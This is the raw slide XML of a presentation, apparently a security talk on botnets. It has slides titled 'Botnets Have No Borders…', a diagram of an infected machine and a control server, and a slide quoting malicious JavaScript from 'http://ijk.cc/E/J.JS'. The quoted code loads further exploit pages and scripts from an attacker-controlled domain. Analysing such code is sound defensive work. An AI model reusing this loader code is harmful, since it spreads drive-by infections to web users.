              <a:t>2006 - present</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Map Globe\world map multicolor.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-1101725" y="1068388"/>
            <a:ext cx="10602913" cy="5724525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29" descr="arrow1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="8704" t="55557" r="41740" b="7240"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1350963" y="3051175"/>
            <a:ext cx="4224337" cy="1909763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30" descr="arrow2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="45444" t="52483" r="38988" b="29231"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5575300" y="2381250"/>
            <a:ext cx="1152525" cy="871538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 31" descr="arrow3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="22279" t="27814" r="62247" b="53745"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2014538" y="2840038"/>
            <a:ext cx="1319212" cy="947737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="230188"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Botnets Have No Borders… </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 6" descr="Funny Guy2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6280150" y="1739900"/>
            <a:ext cx="838200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3036888" y="4878388"/>
            <a:ext cx="4333875" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 27"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="568325" y="2159000"/>
            <a:ext cx="1600200" cy="1069975"/>
            <a:chOff x="685800" y="2667000"/>
            <a:chExt cx="1600200" cy="1069778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43024" name="Picture 7" descr="j0285750"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="885234" y="2667000"/>
              <a:ext cx="1142999" cy="762000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="685800" y="3428860"/>
              <a:ext cx="1600200" cy="307918"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="342900" indent="-342900">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Infected machine</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5780088" y="2668588"/>
            <a:ext cx="1676400" cy="307975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Send Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43019" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3305175" y="2138363"/>
            <a:ext cx="2438400" cy="1700212"/>
            <a:chOff x="3305298" y="2138722"/>
            <a:chExt cx="2438400" cy="1699668"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="43020" name="Group 20"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3620474" y="2138722"/>
              <a:ext cx="1676400" cy="1050981"/>
              <a:chOff x="460300" y="2380914"/>
              <a:chExt cx="2123440" cy="1336598"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="43022" name="Picture 7" descr="j0285750"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId9"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="803339" y="2380914"/>
                <a:ext cx="1437363" cy="962097"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43023" name="Text Box 13"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="460300" y="3326093"/>
                <a:ext cx="2123440" cy="391419"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="342900" indent="-342900" algn="ctr">
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400"/>
                  <a:t>Control Server</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43021" name="Picture 2"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3305298" y="3162115"/>
              <a:ext cx="2438400" cy="676275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>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4" presetClass="entr" presetSubtype="16" fill="hold" nodeType="after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box(in)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="4" presetClass="entr" presetSubtype="16" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(in)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="4" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(in)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="4" presetClass="entr" presetSubtype="16" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(in)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="30" presetID="2" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33"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8"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>http://ijk.cc/E/J.JS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="4572000" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	if(D){ return true;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("http://"+d+"/E/isci/isci_my.js");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if(D){return true;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("http://"+d+"/E/ff104/ff104.htm");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if(D){return true;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
